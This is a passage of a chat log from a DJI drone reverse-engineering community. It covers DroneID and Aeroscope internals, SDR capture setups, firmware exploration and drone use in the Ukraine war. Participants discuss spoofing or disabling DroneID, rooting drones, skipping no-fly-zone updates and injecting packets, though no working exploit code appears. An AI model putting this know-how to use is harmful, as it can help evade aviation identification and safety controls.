they'd have had to hardcode a key (or set of keys, or method to derive a key) into all products to enable that.
[2022-03-24 17:34:58]
droneuser :
i think the at88 chip stores the key
[2022-03-24 17:35:41]
hostile :
that's certainly not a statement to toss around lightly. Worth some verification, and honestly has much larger security implication if a valid statement.
[2022-03-24 17:36:36]
hostile :
if that is the case, one lost / rogue Aeroscope would mean entire userbase compromise.
[2022-03-24 17:46:21]
konraditurbe :
Well, for 749 GBP or ~1k USD you can rent one for a week. https://www.heliguy.com/products/rental-dji-aeroscope-mobile
[2022-03-24 19:12:27]
hostile :
looks like for now I'll be sorting out hackrf issues for the day. https://github.com/bastibl/gr-ieee802-11/issues/83
[2022-03-24 19:12:58]
hostile :
"gr::log :INFO: sync_long0 - LONG: frame start at 320" is all I get now =]
[2022-03-24 20:25:17]
nopexecutor :
In OcuSync2 the droneid packet is not encrypted. The PDU format is similar to the wifi one, but not exactly the same
[2022-03-24 20:27:08]
nopexecutor :
As to other comms - it depends... they also call the upgraded Phantom 4 Pro V 2.0 comms OcuSync 2, while the protocol is actually different compared e.g. to the Mavic Air 2
[2022-03-24 20:27:49]
nopexecutor :
First one uses AES128, but not everything is encrypted - if I recall correctly video feed was _not_ encrypted
[2022-03-24 20:28:07]
nopexecutor :
In MA2 it's AES256, with video feed also encrypted
[2022-03-24 20:30:23]
nopexecutor :
But in both its implementation is either stupid, or broken on purpose (in a slightly different way...) and in certain conditions it can be decrypted. Session key changes on drone restart, but often can be easily found out...
[2022-03-24 20:33:55]
hostile :
Lightbridge had similar goofy mistakes that I'm not at liberty to discuss, nor do I fully technically understand. I do know that when we (D13) told DJI staff we could inject DUML into lightbridge their engineering staff said we were lying. :sweat_smile:
[2022-03-24 20:34:25]
skyninja :
your HackRF problem is probably due to the DC spike. For a 1/4 channel you can sample with a 2.5 MHz offset.
[2022-03-24 20:34:34]
hostile :
yeah that is my assumption as well Sky.
[2022-03-24 21:19:22]
fredmicrowave :
If it can help :
https://www.rtl-sdr.com/removing-that-center-frequency-dc-spike-in-gnuradio-the-easy-way/
[2022-03-24 22:08:48]
tmbinc :
If you have enough bandwidth, just shift your tuner frequency and shift it back digitally, i.e. introduce an IF.
[2022-03-24 23:27:28]
hostile :
Looks like for this one, based on model number there is no 2.4ghz. Only 5ghz.
[2022-03-25 01:56:23]
hostile :
I'm wondering now if an NGFF to USB adapter can be used with older M2 wireless cards like the QCNFA222 https://www.amazon.com/Wireless-Adapter-Module-Testing-Tools/dp/B01NBH4KZM
[2022-03-25 07:20:57]
skyninja :
You can better focus on an outdoor access point you can use to sniff DJI wi-fi drone ids. What's the use of having a USB dongle on your laptop?
[2022-03-25 07:21:40]
skyninja :
https://mikrotik.com/product/mantbox_2_12s
[2022-03-25 07:22:12]
skyninja :
This one is only 2.4GHz band, but has an Atheros chipset you can set to 5 MHz. You can flash OpenWRT on it.
[2022-03-25 07:22:53]
skyninja :
https://mikrotik.com/product/RB921GS-5HPacD-15S
[2022-03-25 07:24:16]
skyninja :
This one is 5GHz band. The r3 they now sell cannot be flashed with OpenWRT. But their RouterOS supports hopping through a channel list and you can capture the packets and send them to a UDP port. Forgot the protocol it's using, but Wireshark supports it out of the box.
[2022-03-25 07:25:48]
skyninja :
They both have a sector antenna. I hoped to get the same effect as the G8 antenna of the Aeroscope. But unfortunately the range is only a few km.
[2022-03-25 12:26:42]
skyninja :
I recorded a 5 MHz channel width signal using hackrf_transfer. Its output format is .cs8, so complex signed bytes. I used an offset tuning of 5.5 MHz and a sample rate of 20 MHz. Using this flowgraph, I convert it to complex floats (.cf32), I remove the DC spike, and mix the signal so the signal is centered in the middle. Then I decimate to 5 Msps and write to file. If I read this file in the wifi_rx flowgraph of gr-ieee802.11, I get good decodes in the .pcap file. Note that I do not have an RF sample of a DJI wi-fi drone, so I used another source of 5 MHz channel width wifi.
[2022-03-25 12:29:49]
skyninja :
Still I recommend the Atheros chip approach and not the gnu radio approach. While this may work in a lab setup, I assume the sensitivity of a hardware Atheros chip is much much better than this gnuradio implementation.
[2022-03-25 12:30:58]
skyninja :
And a wi-fi access point is much cheaper than HackRF + computer.
[2022-03-25 16:01:15]
hostile :
"What's the use of having a USB dongle on your laptop?" historically many people wanted USB access. Having it run on a laptop or ANY device with a USB port is better than commandeering a router. But also using a router is a great idea too! We should make all these things possible.
[2022-03-25 16:02:04]
hostile :
as long as the cards & firmware support tuning to 1/4 band, could 100% use those mikrotiks @skyninja
[2022-03-25 16:02:49]
hostile :
I'll try to replicate your work today! the firmware on my hackrf was stuck on 2017 and I couldn't get it to speak to gnuradio-companion. I think I have it sorted out now though.
[2022-03-25 16:04:15]
hostile :
now we need to invert it @skyninja and accept from file-sink and send to wifi_tx from gr-ieee802.11 instead of RX. *evil grin*
[2022-03-25 16:04:59]
hostile :
don't forget @skyninja that many places have SDR gear that is way better than hackrf... and this base flow graph is useful to integrate into more precise equipment. We were using ETTUS gear at D13 for example.
[2022-03-25 16:05:42]
hostile :
also may be easier to get HackRFs or other SDRs into some folks' hands in *certain* situations vs this special Atheros chip.
[2022-03-25 16:06:41]
skyninja :
but for that price you can just as well buy an Aeroscope.
[2022-03-25 16:07:14]
hostile :
depends on your goals... and your procurement limitations.
[2022-03-25 16:07:40]
hostile :
I sure as shit would rather implement a gnuradio flow graph into existing gnuradio platform , as opposed to try to integrate some untrusted .cn device into my workflow
[2022-03-25 16:07:41]
the_lord :
but with aeroscope you can't replay your captured data ;)
[2022-03-25 23:32:32]
hostile :
so has anyone considered compiling an app to run on the drones to spoof drone ID via the kernel module? We'd obviously need root on the specific drone in question.
[2022-03-25 23:36:05]
joonas :
joonas joined the channel.
[2022-03-26 17:58:24]
hostile :
going back and comparing https://approveddronepilots.co.uk/wp-content/uploads/2018/05/Anatomy-of-DJI-Drone-ID-Implementation1.pdf to the Mini SE...
[2022-03-26 18:00:16]
hostile :
they're still using adhoc
[2022-03-26 18:00:23]
hostile :
```generate random key: %s
```
[2022-03-26 18:00:40]
hostile :
```iw dev wlan0 ibss join adhoc %d %02x:%02x:%02x:%02x:%02x:%02x beacon-interval %u key d:0:%s
```
[2022-03-26 18:02:18]
hostile :
Can see in dji_network for the mini se
[2022-03-26 18:08:57]
hostile :
ath6kl_flight_info_write
ath6kl_flight_info_read
ath6kl_dji_key_read
ath6kl_djiie_read
[2022-03-26 18:10:42]
hostile :
there we go
[2022-03-26 18:10:54]
hostile :
just echo 0 to the kernel module? disables the ie on wifi?
[2022-03-26 18:14:27]
hostile :
all looks remarkably similar
[2022-03-26 18:37:47]
coldflake :
Yo bro!
That's pretty interesting...I am up for chipping in :)
[2022-03-26 18:41:43]
hostile :
long time no see.
[2022-03-26 18:42:32]
hostile :
I need to cop root on this mini SE, but I don't have the current access.
[2022-03-26 21:14:57]
faineg :
faineg joined the channel.
[2022-03-27 02:35:58]
hostile :
haha saw this on the file system. A way to change the channel width on the drone.
[2022-03-27 02:36:08]
hostile :
```$ cat ./bin/width_switch.sh
#!/bin/sh
WIDTH=$1
FREQ=$2
MAC=$3
KEY=$4
if [ "$WIDTH" = "40" ]; then
echo "1 0 1 0" > /sys/kernel/debug/ieee80211/phy$(iw dev wlan0 info | grep wiphy | awk '{print $NF}')/ath6kl/ht_cap_params
echo "0 0 1 0" > /sys/kernel/debug/ieee80211/phy$(iw dev wlan0 info | grep wiphy | awk '{print $NF}')/ath6kl/ht_cap_params
else
echo "1 0 0 0" > /sys/kernel/debug/ieee80211/phy$(iw dev wlan0 info | grep wiphy | awk '{print $NF}')/ath6kl/ht_cap_params
echo "0 0 0 0" > /sys/kernel/debug/ieee80211/phy$(iw dev wlan0 info | grep wiphy | awk '{print $NF}')/ath6kl/ht_cap_params
fi
echo $WIDTH > /sys/kernel/debug/ieee80211/phy$(iw dev wlan0 info | grep wiphy | awk '{print $NF}')/ath6kl/fw_debug
iw dev wlan0 ibss leave
if [ -z "$KEY" ]; then
iw dev wlan0 ibss join adhoc $FREQ $MAC beacon-interval 200
else
iw dev wlan0 ibss join adhoc $FREQ $MAC beacon-interval 200 key d:0:$KEY
fi
exit 0
```
[2022-03-27 02:37:19]
hostile :
I wonder if some countries have limitations on the 5mhz channel spacing.
[2022-03-27 02:37:47]
hostile :
```$ grep width_switch . -r
Binary file ./bin/dji_network matches
```
[2022-03-27 02:39:06]
hostile :
yup! oh hai there 40mhz channels.
[2022-03-27 02:53:00]
hostile :
https://dji-rev.com/dji-rev/pl/eku6i7uwn3ybx8q93ipc97tsdc
[2022-03-27 02:53:14]
hostile :
https://docs.djicdn.com/Products+info/ZS600C_V2597.zip
[2022-03-27 02:53:54]
hostile :
https://twitter.com/d0tslash/status/1507913013436854272
[2022-03-27 04:20:11]
hostile :
Looks to be the RockChip firmware for the AeroScope's crystal sky unit.
[2022-03-27 04:20:18]
hostile :
```$ ./rkunpack ../ZS600C_v2597_20180709_m1300.bin
rkunpack: info: RKFW signature detected
rkunpack: info: version: 5.0.0
rkunpack: info: date: 2018-06-27 23:29:15
rkunpack: info: family: rk32xx
rkunpack: info: 00000066-0005b9ec BOOT (size: 375175)
rkunpack: info: 0005b9ed-2a20c1f0 embedded-update.img (size: 706414596)
unpacked
```
[2022-03-27 04:29:40]
hostile :
https://mydjiflight.dji.com/links/links/areoscope_type
[2022-03-27 04:30:03]
hostile :
that looks like the list of detected drone types
[2022-03-27 04:30:44]
hostile :
```{
"typeMap": {
"1": "Inspire 1",
"2": "Phantom 3 Series",
"3": "Phantom 3 Series",
"4": "Phantom 3 Std",
"5": "M100",
"6": "ACEONE",
"7": "WKM",
"8": "NAZA",
"9": "A2",
"10": "A3",
"11": "Phantom 4",
"12": "MG1",
"14": "M600",
"15": "Phantom 3 4k",
"16": "Mavic Pro",
"17": "Inspire 2",
"18": "Phantom 4 Pro",
"20": "N2",
"21": "Spark",
"23": "M600 Pro",
"24": "Mavic Air",
"25": "M200",
"26": "Phantom 4 Series",
"27": "Phantom 4 Adv",
"28": "M210",
"30": "M210RTK",
"31": "A3_AG",
"32": "MG2",
"34": "MG1A",
"35": "Phantom 4 RTK",
"36": "Phantom 4 Pro V2.0",
"38": "MG1P",
"40": "MG1P-RTK",
"41": "Mavic 2",
"44": "M200 V2 Series",
"51": "Mavic 2 Enterprise",
"53": "Mavic Mini",
"58": "Mavic Air 2",
"59": "P4M",
"60": "M300 RTK",
"61": "DJI FPV",
"63": "Mini 2",
"64": "AGRAS T10",
"65": "AGRAS T30",
"66": "Air 2S",
"67": "M30",
"68": "DJI Mavic 3",
"69": "Mavic 2 Enterprise Advanced",
"70": "Mini SE"
}
}
```
[2022-03-27 05:38:26]
oakley75 :
thanks for that list fr. can't believe a2 and naza are on there ha
[2022-03-27 08:53:53]
eddy :
eddy joined the channel.
[2022-03-27 09:19:23]
matthijst :
matthijst joined the channel.
[2022-03-27 13:34:32]
hostile :
I'm gonna have to walk the country code settings and see which country can't do 5mhz channels, and only gets 40mhz instead. https://fccid.io/B94HHI31C/Letter/Support-Bulletin-1616417.pdf
[2022-03-27 19:00:34]
fredmicrowave :
And Wookong M (WKM) is here too! But there is no Wookong H for some reason.
I have both, never updated. Interesting to know that they can be detected too.
[2022-03-27 23:28:23]
hostile :
I'm gonna guess that compatibility only works over lightbridge
[2022-03-27 23:33:43]
fredmicrowave :
But there is no video system included in Naza or Wookong, you need to provide a separate video TX system ...
[2022-03-27 23:35:01]
fredmicrowave :
All you get with those is telemetry injected in the video by OSD
[2022-03-27 23:36:30]
fredmicrowave :
So yes I guess it would mean that they can only be detected if using lightbridge with Naza or WKM , then probably WKH too.
[2022-03-28 00:01:35]
hostile :
exactly
[2022-03-28 00:03:42]
hostile :
I just created #EnhancedWifi to move some of this discussion to the appropriate place re the link specific stuff I'm messing with on the Mini SE and previously messed with on the Spark & Air series
[2022-03-28 00:47:55]
cs2000 :
cs2000 joined the channel.
[2022-03-28 00:48:15]
cs2000 :
~enhancedwifi
[2022-03-28 00:49:04]
cs2000 :
@hostile just so you know, Mattermost uses the Tilde symbol rather than a hash to link to channels ;)
[2022-03-28 00:49:36]
cs2000 :
@cs2000 left the channel.
[2022-03-28 00:50:01]
cs2000 :
cs2000 joined the channel.
[2022-03-28 01:29:08]
mavic2reverser :
mavic2reverser joined the channel.
[2022-03-28 04:35:59]
stanlee :
stanlee joined the channel.
[2022-03-28 04:57:31]
d95gas :
d95gas joined the channel.
[2022-03-28 10:14:43]
lordhelmchen666 :
lordhelmchen666 joined the channel.
[2022-03-28 15:26:28]
vladsol2009 :
vladsol2009 joined the channel.
[2022-03-28 16:36:07]
anethema :
anethema joined the channel.
[2022-03-28 16:36:16]
anethema :
@anethema left the channel.
[2022-03-28 16:50:01]
hostile :
well I'll be damned! Mavlink has droneID packets now!? https://mavlink.io/en/messages/common.html#OPEN_DRONE_ID_BASIC_ID
[2022-03-28 18:49:12]
dkovar :
RemoteID packets, of a form. Makes sense if the RemoteID regulations go into effect as planned. This means that vendors using Mavlink can comply quickly.
[2022-03-28 22:02:23]
fredmicrowave :
Scary to think that with droneId always active, automated infraction detection could be easily implemented in any territory...As soon as you go over 120m, you may get automatically fined. A bit like having a gps in your car that tells when you go over speed limits. Beautiful future.
[2022-03-28 22:03:10]
konraditurbe :
someone is going to make flightradar24 but for drones and its going to suck
[2022-03-29 00:44:56]
hostile :
someone has owned dronetrader24.com for a long time, and it does suck
[2022-03-29 00:45:35]
hostile :
someone owns droneradar24.com and it does suck... I own dronetrader24.com
[2022-03-29 00:46:02]
hostile :
if we sort out a proper decode technique we should encourage trusted folks to capture and submit to a central DB
[2022-03-29 01:11:08]
hostile :
also uavionix (adsb in makers for drones) bought the droneradar24 domain, and just redir it to their home page.
[2022-03-29 01:42:55]
fredmicrowave :
Ah, lucrative anticipation... :nauseated_face:
Would be fun to autospoof it .
[2022-03-29 02:01:08]
dkovar :
There are a number of efforts to crowdsource and distribute remote ID data already in the works. Some are public safety only, some are true crowd source for the masses.
[2022-03-29 07:24:25]
mangadiso :
midgelf joined the channel.
[2022-03-29 08:14:23]
priegor :
priegor joined the channel.
[2022-03-29 12:28:12]
flyte9 :
flyte9 joined the channel.
[2022-03-29 13:18:13]
ucusdyuxljbqrlc :
ucusdyuxljbqrlc joined the channel.
[2022-03-29 17:23:20]
andris8888 :
andris8888 joined the channel.
[2022-03-29 22:47:01]
icer :
icer joined the channel.
[2022-03-29 22:47:07]
icer :
Howdy all
[2022-03-29 22:49:04]
icer :
I like how gangsta hostile is. Just mention something on Twitter and a billion dollar company goes running scared
[2022-03-29 23:17:29]
hostile :
you should see the in private commentary they are dealing with RN.
[2022-03-29 23:38:21]
icer :
Crazy?
[2022-03-30 00:13:52]
hostile :
just having to deal with me and GPL. Maybe soon we wind up with full kernel source for these kernel modules that handle droneID is all I'm sayin ;)
[2022-03-30 01:32:18]
mavic2reverser :
Maybe because they know they're hiding from vulnerabilities in them?
[2022-03-30 04:14:46]
hostile :
I love how clean the DJI Fly iOS app decompiles.
[2022-03-30 04:33:03]
hostile :
also still can't figure out wtf this is.
[2022-03-30 04:49:08]
hostile :
similarly unclear what this cached upload is either
[2022-03-30 04:50:03]
hostile :
one sets a url to /flying_record_upload/secret, and the other to /history_record_upload/secret/gzip. Totally not sus. Unfortunate naming at best.
[2022-03-30 04:51:51]
hostile :
like if I were DJI, and I have a cached record upload thing, I'd want to keep it all the fuck away from the word "secret", but maybe that is just me.
[2022-03-30 04:54:30]
hostile :
maybe just a china thing?
[2022-03-30 10:32:04]
demion :
demion joined the channel.
[2022-03-30 11:11:34]
windoze :
windoze joined the channel.
[2022-03-30 13:38:02]
mavic2reverser :
Usually for objective c I like using hopper as it handles decompiling it better BUT dji seemed to leave in all the symbols as ghidra is just as good it looks like!
[2022-03-30 18:35:29]
hostile :
yuuuup lol
[2022-03-30 19:13:04]
faineg :
I'm late to this one but I do think that we desperately need something like that we can deploy in war zones for humanitarian aid workers who want everyone to know exactly who they are
[2022-03-30 19:13:29]
faineg :
in a similar fashion to how Red Cross medical transport aircraft are marked and use various forms of self-ID
[2022-03-30 19:15:07]
faineg :
Also just spoke to a WSJ reporter about the entire drone situation and she asked if the Russians theoretically *could* turn off the automated self-ID via some sort of hack, which, idk, is that theoretically possible?
[2022-03-30 19:21:05]
hostile :
sure *we* as a group published the DUML command to disable DroneID years ago. DJI recently removed the App side ability to send the command, and I think beefed up security around it generally speaking. But yeah that isn't "theory" we as a group enabled that years ago
[2022-03-30 19:21:15]
hostile :
100% possible on specific firmware version on historic birds
[2022-03-30 19:21:45]
hostile :
November 23rd 2017... https://nolimitdronez.com/nld-vs-dji-aeroscope
[2022-03-30 19:21:48]
faineg :
yeah, i told her "sure they could" and referenced your work
[2022-03-30 19:21:57]
faineg :
wanted to make 100% sure i was right
[2022-03-30 19:21:59]
hostile :
NLD is composed of "OGs" from here.
[2022-03-30 19:22:09]
hostile :
good on you for checking accuracy. =]
[2022-03-30 19:23:54]
konraditurbe :
If both the drone and controller never pick up a GNSS fix. .. the DroneID packets broadcast 0.000,0.000? @hostile
[2022-03-30 19:24:59]
hostile :
they used to IIRC. It's been a while since I've actively capped em. just got a 1/4 band wifi card today in the mail so I should be able to speak intelligently about the mini, spark, and air series on enhanced wifi
[2022-03-30 19:26:02]
faineg :
so the ol' tinfoil hat solution would work too, correct
[2022-03-30 19:26:11]
konraditurbe :
for a few mins yeah
[2022-03-30 19:26:30]
konraditurbe :
my air2 wrapped in several layers got 7 sats in 10 minutes
[2022-03-30 19:29:05]
konraditurbe :
the key would be to replace the GNSS board with a "dummy" version, that doesn't carry a GPS antenna but does not burn out the main PCB.
[2022-03-30 19:29:19]
hostile :
also @faineg don't forget that 'Russians' have been an integral part of the DJI scene just the same. Coptersafe was around very early on https://www.theverge.com/2017/6/21/15848344/drones-russian-software-hack-dji-jailbreak
[2022-03-30 19:29:50]
hostile :
before we were fully established they were the defacto place to go. https://www.coptersafe.com/product/nfz-mod-phantom-4/
[2022-03-30 19:30:01]
hostile :
shortly after they moved to using software hacks instead of hardware shims.
[2022-03-30 19:30:04]
konraditurbe :
Definitively. There are several DJI russian groups on Telegram... And they seem to have their own IOS IPA hack thing.
[2022-03-30 19:30:09]
skyninja :
flight controller does not work very well without gps. most pilots will have difficulty without gps assistance
[2022-03-30 19:30:31]
konraditurbe :
ATTI mode or being caught by aeroscope...
[2022-03-30 19:30:39]
hostile :
ATTI mode or bust! that is a consequence of rookie pilots learning to fly on FPV and never learning LOS.
[2022-03-30 19:31:02]
skyninja :
just use another brand than DJI.
[2022-03-30 19:31:24]
konraditurbe :
Wonder when we'll see more FPV type stuff being used. Easier to repair, no aeroscope mess.
[2022-03-30 19:31:30]
hostile :
we really need to work at porting arducopter / paparazzi or cleanflight or what ever to DJI hardware just to be extra disruptive.
[2022-03-30 19:31:55]
konraditurbe :
autel doesn't broadcast aeroscope stuff fwiw
[2022-03-30 19:31:56]
faineg :
that was what i told her as well - you need a pilot who actually knows what they're doing to fly w/o GPS
[2022-03-30 19:32:03]
faineg :
it's a pain in the ass
[2022-03-30 19:32:12]
faineg :
well, if you're not experienced anyway
[2022-03-30 19:32:20]
konraditurbe :
Losing a drone can be potentially damaging too
[2022-03-30 19:32:26]
faineg :
indeed
[2022-03-30 19:32:28]
konraditurbe :
SD card can snitch on your position
[2022-03-30 19:32:37]
faineg :
oh we worry about that a LOT in humanitarian aid
[2022-03-30 19:32:45]
faineg :
and i wish we had better data self destruct solutions
[2022-03-30 19:33:15]
joonas :
betaflight for non gps and inav for gps assisted flight would be the fw-s du jour if you want the latest in flight performance.
[2022-03-30 19:33:52]
hostile :
I'm really glad we killed openpilot / dev rot happened. Cuz we had this morality issue with the maturity of our gps / nav code too
[2022-03-30 19:34:03]
konraditurbe :
My worry is that European Mavic3 drones broadcast EU DroneID packets over WiFi/BLE which can be picked up by nearby phones, wonder what gets the code kicked in: being activated in EU, or actually flying in EU.
[2022-03-30 19:34:15]
hostile :
GPS assist + rattitude was fucking nasty. https://www.youtube.com/watch?v=3D8BzaadYoI
[2022-03-30 19:34:29]
konraditurbe :
That DJI dealer was saying to activate drones outside UA... and most drones are purchased in the EU..
[2022-03-30 19:34:30]
mavic2reverser :
there are ways to fly without logging :)
[2022-03-30 19:36:05]
faineg :
more contemplating stuff like "i've got all these close-up photos of a refugee camp with a minority population that XYZ attacking military hates and they could use those for nefarious ends if they get the SD card"
[2022-03-30 19:36:41]
konraditurbe :
@hostile was there a param or something to remove the logging for dji assistant on earlier drones (spark)? iirc I had it on but forgot what it was
[2022-03-30 19:36:49]
faineg :
that's a damn good question
[2022-03-30 19:36:55]
mavic2reverser :
ah! the enterprise versions of dji products support sd card encryption I believe, haven't poked at it more than that
[2022-03-30 19:37:03]
hostile :
you are asking me to tap into long gone brain cells @konraditurbe =]
[2022-03-30 19:37:29]
faineg :
yeah i need to update my knowledge on what's encrypted and what isn't nowadays
[2022-03-30 19:37:34]
faineg :
SD card wise
[2022-03-30 19:37:59]
konraditurbe :
videos and photos are not encrypted on consumer mavics.
[2022-03-30 19:38:00]
mavic2reverser :
I think it was mostly in response to allow dji to sell to governments
[2022-03-30 19:38:17]
faineg :
any other gems of wisdom about Aeroscope i should convey to the WSJ reporter (who seems good but definitely doesn't know anything about drones)
[2022-03-30 19:38:43]
konraditurbe :
but if you take out the sd card you can have your phone/tablet "record" the FPV stream, and have that as the video, instead of recording to the drone
[2022-03-30 19:38:51]
faineg :
i gave her your twitter handle with a general "check this out regarding the 'can DJI actually access all this data about who's flying what where or not'" question @hostile
[2022-03-30 19:39:25]
faineg :
yeah, so in these cases people are usually doing mapping missions and off the top of my head that wouldn't work
[2022-03-30 19:39:39]
faineg :
would work just fine for search and rescue stuff, certainly
[2022-03-30 19:40:00]
konraditurbe :
People are hyping up aeroscope too much, max range on the mobile unit is 7km.
[2022-03-30 19:40:05]
faineg :
seriously
[2022-03-30 19:40:08]
faineg :
i'll remind her of that
[2022-03-30 19:40:12]
faineg :
i forget that people don't know that
[2022-03-30 19:41:17]
faineg :
she also asked me if the russians could have "hacked Aeroscope to reveal the pilot position" which I had to clear
[2022-03-30 19:41:22]
faineg :
up for her
[2022-03-30 19:41:52]
skyninja :
both sides are using dji drones and Aeroscope. more knowledge/awareness to the general audience: will that help UA?
[2022-03-30 19:42:37]
faineg :
that's the other thing i'm trying to impress on her - also sending over my spreadsheet - everyone is goddamn using these things right now, including journalists and probably some random civilians
[2022-03-30 19:42:53]
faineg :
that's also what i'm yelling about a lot to the humanitarians and the international humanitarian law people - everyone has them!
[2022-03-30 19:43:38]
konraditurbe :
and DJI cannot just "deactivate all aeroscopes", but they can stop issuing new activation accounts based on criteria (eg: email handler is Russian). https://dl.djicdn.com/downloads/AEROSCOPE/20190925/Aeroscope_Management_System_User_Guide_EN.pdf
[2022-03-30 19:44:04]
konraditurbe :
Yeah and DJI has said they will continue to sell in Russia :(
[2022-03-30 19:44:37]
skyninja :
if UA is smart they do not use consumer drones for warfare.
[2022-03-30 19:45:01]
faineg :
UA is using DJI stuff *constantly*
[2022-03-30 19:45:31]
hostile :
just make sure she sees this old, still applicable gem @faineg https://twitter.com/d0tslash/status/1087373231152160768 we should be getting a version on steroids out soon that can do OcuSync also. Ukrainians literally begging me every day to put out an up to date spoofer.
[2022-03-30 19:45:39]
faineg :
if you scan through the spreadsheet of small drone incidents in Ukraine I've been maintaining, a whole lot of confirmed DJI appearances https://docs.google.com/spreadsheets/d/1NtgseODXGSAomx6G5Efwz4XY6AuYF9ZjGSGiCxvNHXE/edit?usp=sharing
[2022-03-30 19:46:50]
hostile :
https://dji-rev.com/dji-rev/pl/3xgb5yspufn4mrzd8ntax8gowh probably a big feat to modify an aeroscope for this, but CUAS is very capable of that. There's probably a DUML packet to "update home position" which you can in essence query it from the pilot's app. But depends on lots of things.
[2022-03-30 19:47:16]
konraditurbe :
Oh and to the topic of drone NFZs: you can literally skip the updates lol, so I love how DJI flexes they can set NFZs, but when you boot the app it asks you if you want to get new NFZs and you can just cancel
[2022-03-30 19:47:17]
hostile :
I hope soon to demonstrate some things I could not talk about previously after a bit more research time. DUML is a rich protocol
[2022-03-30 19:48:07]
hostile :
what about with an amplifier and antenna tho?
[2022-03-30 19:48:07]
konraditurbe :
Wait, but Aeroscope can reveal the RC position.
[2022-03-30 19:48:35]
konraditurbe :
Still need to see conclusive evidence it has been used by any side.
[2022-03-30 19:48:35]
hostile :
from the droneID packet home position eh?
[2022-03-30 19:48:41]
hostile :
not *current* standing location
[2022-03-30 19:48:47]
konraditurbe :
Ah yep
[2022-03-30 19:49:06]
hostile :
I've personally been messaged by special forces on Ukrainian side making this claim begging me for help spoofing Konrad.
[2022-03-30 19:49:10]
hostile :
as recently as this morning
[2022-03-30 19:49:44]
konraditurbe :
Time to get them ESP32s.
[2022-03-30 19:49:59]
konraditurbe :
@faineg good explainer on aeroscope: https://youtu.be/wB55Gq0X-rQ
[2022-03-30 19:50:00]
faineg :
claims about it being used against them?
[2022-03-30 19:50:12]
hostile :
yes my old H.A.R.D (hackers against remote droneID) code gets referenced VERY frequently
[2022-03-30 19:50:24]
hostile :
lemme DM you faine
[2022-03-30 19:50:41]
faineg :
i'm interested as i've also been keeping an eye out for examples of aeroscope being used in the wild to harm the Ukrainians
[2022-03-30 19:51:59]
konraditurbe :
@hostile Huh, seems the RC GPS is being sent to bird and getting broadcasted (pilot vs home location)
[2022-03-30 19:52:19]
konraditurbe :
(This is from Aerial Armor, which uses AS as backbone)
[2022-03-30 19:52:54]
hostile :
there ya go. I did not know Pilot Coordinate was added to the structure. That was one of the things I was set to confirm asap.
[2022-03-30 19:53:12]
konraditurbe :
Yep, pilot position, aka RC GPS gets sent in real time: https://youtu.be/wB55Gq0X-rQ?t=340
[2022-03-30 19:54:07]
konraditurbe :
This is the claim: https://twitter.com/vshymanskyy/status/1503743071627927565
[2022-03-30 19:54:34]
konraditurbe :
Could be coincidence, or they spotted him another way
[2022-03-30 19:56:13]
faineg :
I've seen that one, thought it was from 2016?
[2022-03-30 19:56:16]
faineg :
Or 2017
[2022-03-30 19:56:25]
hostile :
that video is at least 2 years old too. Folks keep trying to associate with recent combat
[2022-03-30 19:57:52]
faineg :
yeah, it's definitely not from the current situation
[2022-03-30 19:58:05]
konraditurbe :
not much of a choice using dji/autel vs DIY, dual export control laws and wassenaar agreement keeps the high end stuff from being imported to UA.
[2022-03-30 19:58:13]
faineg :
i believe it's happening, just hard to go public with it w/o some kind of video proof or an official source i suppose
[2022-03-30 19:58:53]
faineg :
i know the Ukrainians appear to have some pretty great home-built stuff but re-upping the supply is going to be a real pain in the ass right now
[2022-03-30 19:58:57]
faineg :
https://www.theguardian.com/world/2022/mar/28/the-drone-operators-who-halted-the-russian-armoured-vehicles-heading-for-kyiv
[2022-03-30 19:58:59]
faineg :
etc etc etc
[2022-03-30 19:59:01]
konraditurbe :
Autel drones are also being flown, and @mainframe found some sketchy stuff with the way the data is handled.
[2022-03-30 19:59:16]
faineg :
yeah, i've definitely seen the Autels and god only knows what's going on there
[2022-03-30 19:59:21]
faineg :
can you link me?
[2022-03-30 19:59:23]
konraditurbe :
nothing good
[2022-03-30 19:59:44]
konraditurbe :
lets say the app talks too much
[2022-03-30 19:59:52]
faineg :
color me unsurprised
[2022-03-30 20:02:11]
konraditurbe :
From a http capture session @mainframe sent me: The app sends the location to their server, in order to query for NFZs every 20 or so seconds. So autel does have visibility as to which drones are being flown and where.
[2022-03-30 20:02:39]
faineg :
ugh, do we know if the ukrainians know
[2022-03-30 20:02:41]
konraditurbe :
There's also some "bug" but still needs to be confirmed
[2022-03-30 20:03:05]
konraditurbe :
I'm in touch with Ukrainian soldiers and volunteers, and I keep saying to always keep the phone in airplane mode
[2022-03-30 20:03:17]
konraditurbe :
No GPS fix, no internet, none of that
[2022-03-30 20:03:34]
faineg :
are they sticking to that or?
[2022-03-30 20:03:59]
faineg :
wired just asked me to write something and i should probably get in touch with some of those guys
[2022-03-30 20:04:38]
konraditurbe :
From what one guy told me, yeah, using tablets.
[2022-03-30 20:05:35]
faineg :
Good
[2022-03-30 20:05:55]
konraditurbe :
But you know some will just pop their phones into the RC
[2022-03-30 20:06:16]
faineg :
a constant struggle with running drone data collection teams under normal conditions in my experience
[2022-03-30 20:06:20]
faineg :
much less war zones
[2022-03-30 20:07:46]
konraditurbe :
On some older drones, eg spark, the drone could not fly too high if it had no GPS fix but this can be modified: https://wiki.dji-rev.com/howto/parameterhacks
[2022-03-30 20:08:36]
faineg :
vast majority of stuff i'm seeing seems to be mavics, if that aligns with what everyone else is seeing/hearing
[2022-03-30 20:09:19]
konraditurbe :
yeah lots of newer drones of course, mavic3/air2/air2s/minis
[2022-03-30 20:10:02]
hostile :
they use some real obscure shit for their video link (Autel) DVB-T encrypted. I could never crack the key.
[2022-03-30 20:10:29]
hostile :
I did have some 0day for services on the drones to pop root back in the day that I never disclosed =]
[2022-03-30 20:10:31]
faineg :
at some point i'll try to sit down and do a comprehensive catalog/ID, but just trying to log everything in the firehose of information in that spreadsheet for now
[2022-03-30 20:11:25]
hostile :
@faineg older mavics would be preferable... as they represent the height of this group's fame and control over DJI product line. Before DJI had to get real serious and kick their game up.
[2022-03-30 20:11:40]
konraditurbe :
@faineg if you can, ask DJI about their plans for a NFZ, I found it funny *they* were the ones who brought it up, and if its ever enacted over UA sky, who will DJI give out unlocks to? On what criteria?
[2022-03-30 20:11:48]
hostile :
activation hacks, droneid hacks, firmware param hacks, etc.
[2022-03-30 20:11:57]
konraditurbe :
We haven't seen many older mavics being used.
[2022-03-30 20:12:08]
konraditurbe :
Most drone donations are newer mavics.
[2022-03-30 20:12:19]
skyninja :
Parrot Anafi, also version with thermal. no funny stuff, you can fly it without things going to the cloud.
[2022-03-30 20:12:19]
hostile :
